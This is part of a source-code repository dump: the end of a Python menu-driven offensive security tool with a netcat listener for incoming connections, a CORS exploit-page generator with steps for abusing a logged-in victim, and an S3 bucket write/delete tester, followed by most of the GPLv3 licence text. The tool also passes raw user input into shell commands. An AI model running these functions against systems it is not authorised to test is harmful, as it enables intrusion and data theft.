540 | if bool(re.match(r'[^a-zA-Z0-9/]', last_char)): 541 | clean_urls.append(url[:-1]) 542 | else: 543 | clean_urls.append(url) 544 | return clean_urls 545 | 546 | file_name = input('File name (e.g tests/test.js):') 547 | print(NEWLINE + "Extracting Url from %s..." % file_name) 548 | line() 549 | urls = extract_urls(open(file_name, 'r').read()) 550 | for url in urls: 551 | print(url) 552 | line() 553 | 554 | 555 | def target_domain(): 556 | HEADERS = {"X-XSS-Protection": ['1; mode=block'], 557 | "X-Content-Type-Options": ['nosniff'], 558 | "X-Frame-Options": ['DENY', 'SAMEORIGIN'], 559 | "Cache-Control": ['no-store, no-cache', 'no-cache, no-store'], 560 | "Content-Security-Policy": [None], 561 | "WebKit-X-CSP": [None], 562 | "X-Content-Security-Policy": [None], 563 | "Strict-Transport-Security": [None], 564 | "Access-Control-Allow-Origin": [None], 565 | "Origin": []} 566 | 567 | domain = input('Target Domain(e.g google.com): ') 568 | 569 | def passed(bar): 570 | print("PASS = " + bar) 571 | 572 | def failed(bar): 573 | print("FAIL = " + bar) 574 | 575 | def info(host): 576 | print("-----------------------------------") 577 | print("Target - " + host) 578 | print("-----------------------------------") 579 | 580 | def format_url(url): 581 | if not url.startswith("http://") or not url.startswith("https://"): 582 | return "http://" + url 583 | return url 584 | 585 | url = format_url(domain) 586 | response = requests.get(url) 587 | info(url) 588 | for header in HEADERS.keys(): 589 | try: 590 | headval = response.headers[header] 591 | if headval in HEADERS[header]: 592 | if HEADERS[header] == "Origin": 593 | if headval != None: 594 | failed(header + ': ' + str(headval)) 595 | else: 596 | passed(header + ': ' + str(headval)) 597 | passed(header + ': ' + str(headval)) 598 | else: 599 | failed(header + ': ' + str(headval)) 600 | except KeyError: 601 | pass 602 | line() 603 | 604 | 605 | def listener(): 606 | choice = int( 607 | input(NEWLINE + '[1] Run Listener \n[2] Install Package\n\nSelection:')) 608 | if choice == 1: 609 | port = input('Enter listening port: ') 610 | print("Incomming connection will be connected automatically on port %s") 611 | os.system('ncat -vv -n -l -p ' + port) 612 | elif choice == 2: 613 | os.system('git clone https://github.com/nmap/nmap; cd nmap') 614 | os.system('./configure;make;make install') 615 | 616 | 617 | def info_gather(): 618 | print("Gathering information...") 619 | line() 620 | print("\tLISTENING Connections") 621 | os.system('lsof -iTCP -sTCP:LISTEN -n -P') 622 | line() 623 | print("\tESTABLISHED Connections") 624 | os.system('lsof -s -i -n -P | grep ESTABLISHED') 625 | line() 626 | 627 | 628 | def cors_config(): 629 | target_url = input( 630 | 'Target Url (e.g https://api.edmodo.com/users/id): ') 631 | evil = input('localhost/IP (e.g https://localhost): ') 632 | print(NEWLINE + "Site will be vulnerable to CORS misconfiguration if these 2 headers are present in the response") 633 | print("[1]Access-Control-Allow-Credentials: true") 634 | print("[2]Access-Control-Allow-Origin: %s" % (evil)) 635 | line() 636 | os.system('curl %s -H "Origin: %s" -I ' % (target_url, evil)) 637 | exp = input(NEWLINE + '[1]Exploit CORS on %s (y/n): ' % 638 | (target_url)).lower() 639 | if exp == 'y': 640 | print("Creating exploit code...") 641 | print("") 642 | cors_file = open('Cors.html', 'w') 643 | body = """ 644 | 645 | 646 | CORS PoC Exploit 647 | 648 | 649 | 650 | CORS Exploitby HackB0x 651 | 652 | 653 | Exploit 654 | 655 | 668 | 669 | 670 | """ % (target_url) 671 | cors_file.write(body) 672 | cors_file.close() 673 | print( 674 | "exploit created with the name of Cors.html in your current directory") 675 | line() 676 | print(Style.BRIGHT + Fore.GREEN + 677 | "Exploitation Steps" + Style.RESET_ALL) 678 | print( 679 | "[1] Start apache server on your local host\n[2] Paste cors.html in /var/www/html/") 680 | print("[3] Login to %s\n[4] Open cors.html using %s and click exploit" % ( 681 | target_url, evil)) 682 | line() 683 | print(NEWLINE + "Loading main menu...") 684 | 685 | 686 | def aws_s3(): 687 | aws = int( 688 | input("[1]Install AWS Package\n[2]AWS Credential\n[3]Run Program\n\nSelection:")) 689 | if aws == 1: 690 | # os.system('brew install awscli') 691 | os.system('pip install awscli') 692 | elif aws == 2: 693 | line() 694 | print("\t\tSample") 695 | line() 696 | print("""AWS Access Key ID: AKIAIOSFODNN7EXAMPLE 697 | AWS Secret Access Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 698 | Default region name: us-west-2 699 | Default output format: json""") 700 | print(NEWLINE + NEWLINE) 701 | os.system('aws configure') 702 | elif aws == 3: 703 | aws_program = input( 704 | 'S3 Bucket name (e.g rubyci.s3.amazonaws.com): ') 705 | print(NEWLINE + "Checking write permission. Creating test.txt to %s " % 706 | (aws_program)) 707 | os.system('aws s3 cp ./tests/test.txt s3://%s' % (aws_program)) 708 | print(NEWLINE + "Try Listing files from %s" % (aws_program)) 709 | os.system('aws s3 ls s3://%s' % (aws_program)) 710 | print(NEWLINE + "Try fetching file from %s." % (aws_program)) 711 | os.system('aws s3 cp s3://%s/test.txt ./' % (aws_program)) 712 | print(NEWLINE + "Checking remove permission. removing test.txt from %s" % ( 713 | aws_program)) 714 | os.system('aws s3 rm s3://%s/test.txt' % (aws_program)) 715 | print("Process Done." + NEWLINE) 716 | 717 | else: 718 | print("Invalid number. Try again!!") 719 | 720 | 721 | def banner(): 722 | with open('./src/banner.md', 'r') as myfile: 723 | print(myfile.read()) 724 | 725 | 726 | def quit(): 727 | print(NEWLINE + "Quitting program..." + NEWLINE) 728 | exit(0) 729 | 730 | 731 | def menu(): 732 | banner() 733 | try: 734 | choice = int(input(NEWLINE + "choice: ")) 735 | print(NEWLINE) 736 | if choice == 1: 737 | xss() 738 | menu() 739 | elif choice == 2: 740 | exploits() 741 | menu() 742 | elif choice == 3: 743 | subd() 744 | menu() 745 | elif choice == 4: 746 | whois_geo() 747 | menu() 748 | elif choice == 5: 749 | ssrf_injection() 750 | menu() 751 | elif choice == 6: 752 | nmap_auto_banner() 753 | menu() 754 | elif choice == 7: 755 | js_url_parser() 756 | menu() 757 | elif choice == 8: 758 | target_domain() 759 | menu() 760 | elif choice == 9: 761 | listener() 762 | menu() 763 | elif choice == 10: 764 | info_gather() 765 | menu() 766 | elif choice == 11: 767 | cors_config() 768 | menu() 769 | elif choice == 12: 770 | aws_s3() 771 | menu() 772 | elif choice == 0: 773 | quit() 774 | else: 775 | print("Please enter the correct number") 776 | menu() 777 | except KeyboardInterrupt: 778 | quit() 779 | except Exception as error: 780 | traceback.print_exc() 781 | print(str(error)) 782 | print("Error try again!!") 783 | menu() 784 | 785 | 786 | if __name__ == "__main__": 787 | menu() 788 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all 